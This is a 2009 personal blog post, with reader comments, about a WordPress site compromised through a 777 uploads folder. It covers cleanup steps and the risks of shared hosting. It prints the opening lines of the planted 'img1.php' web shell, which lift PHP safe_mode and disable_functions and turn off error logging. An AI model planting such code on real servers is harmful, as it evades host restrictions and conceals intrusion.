Splash of Style...Macs, Photography, Design, and other Passions

I Was Hacked!

October 2, 2009 by debbie T | WordPress

Eeek! First off, let me say Thank God that I had the WordPress plugin “WordPress File Monitor” installed, because that is what alerted me to the problem. Note to Bart B if you are reading this, heehe, I am glad I wasted my time with that voodoo! 😉

So, I get an email today from the WordPress File Monitor (dated yesterday, I am slow) informing me that a bunch of files were uploaded to one of my other blogs in the “uploads” directory – left as 777 permissions for easy photo uploading.

In the uploads directory, a file named “img1.php” was added, along with a fresh new directory named “2008” with a bunch of sitemap files. (note: I just started this blog in July of 2009, and I have no entries or uploads from 2008, so it was very fishy.)

So, of course my first thought is am I going crazy? Did I somehow upload these files without knowing? Initially at first I didn’t notice the .php file, so I only thought the 2008 sitemap files were added.

I contacted my host, and she assured me that it wasn’t anything too terrible, that it was an every day run of the mill spammer. Sneaky spammers! She has seen this sort of thing many times.

She suggested I change my WordPress password and check the database for any extra users. I found no other user accounts, thankfully!

For future reference, I found two articles that list details on how to find and remove any hidden admin users:

http://blog.nachotech.com/?p=125
http://www.studionashvegas.com/wordpress/latest-wordpress-hack-check-your-permalinks-people/

But now I am left puzzled on how they got in!

My WordPress admin password was pretty strong – 15 characters (numerical, upper and lower case letters) and I wasn’t using the default “admin” as my user name either. My host also suggested it might have been from “an exploit via a plugin that isn’t secured against arbitrary remote inclusion/retrieval”

I am only running 4 plug-ins. Akismet, Hello Dolly, WP Security Scan, and WordPress File Monitor. I did also have the un-updated WordPress Exploit Scanner plug-in, but it was left de-activated. I have since removed it from the plugins folder.

I suppose since I don’t have a secure login, I imagine that possibly my password could have been bypassed? I dunno. I think I might install the Login Lockdown plugin – yeah, Bart more voodoo!

Well, anyway, I am going to really search through my files and make sure everything else is alright.

I found an article that might help me search through the database just in case the spammers attached anything to my posts.

Right now, it doesn’t look like much damage was done. But worse case scenario, I have database backups every night. I can always revert back to one of the older ones and re-create the newer entries I wrote, or I could even export my entries and install a fresh copy of wordpress. We’ll see.

So, be wary of your WordPress blogs! I dunno how they got into mine, but they did, and thankfully I was lucky and it wasn’t too painful!

PS. I took a look at the .php file they added, and one of the first lines of code was $language=’ru’ (aah, From Russia with love!) But anyway, here is the some of the code from the file:

error_reporting(0);
$language='ru';
$auth = 0;
$name='abcdef1234567890abcdef1234567890'; 
$pass='abcdef1234567890abcdef1234567890';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);

There are 4 comments

  1. Hi Debbie,

    So sorry to hear you got hacked 🙁 I’m also delighted the damage seems to have been light.

    You say it was in a 777 folder, are you on shared hosting? If so, any other user of that server could have done it. Or, a hacker hacking any account on that server could have also taken you out. On shared hosting 777 is so so dangerous. It forces you to trust all your fellow server-sharers.

    I’m going to take back what I said earlier – if you’re on shared hosting there clearly are benefits to some of these security plugins. Bear in mind though – the attacker could have read your DB details straight out of config.php (they had file-system access since they created files) and used that to disable your plugin. I guess they were thankfully too dumb to do that this time.

    There’s a lot to be said for dedicated or virtual dedicated hosting.

    Bart.

    Comment by Bart B on October 2nd, 2009
  2. Bart, I know you talk about the insecurities of shared hosting, but (and I may be TOTALLY naive about this) I think my host has extra precautions put in place. Or maybe I just don’t know what I am talking about!

    I guess I just don’t understand how one vulnerability can affect other users being “walls” so to speak.

    Do you need to have sudo abilities to do that?

    Sorry for so many questions, but I am really blind when it comes to stuff like this!

    I will email you as well! Thanks Bart!

    Comment by debbie T on October 2nd, 2009
  3. You simply can’t protect from 777. The last 7 is the kicker – it means ALL USERS on the system have read, write, and execute permission.

    Assuming your host is indeed doing something special, it is probably doing php-sudo which means that your PHP scripts run as you, and the other user’s PHP scripts are running as those other users. However, php has to run as A user, and ANY user can write to a 777 folder. So, even if your host is going above and beyond the norm by deploying php-sudo, 777 still defeats it.

    Am I making sense?

    Bart.

    Comment by Bart B on October 2nd, 2009
  4. Hey Bart, I will email you what they told me and you can know for sure!

    I am going to try to keep all my folders away from 777 for now. Just until I can figure it all out.

    Comment by debbie T on October 2nd, 2009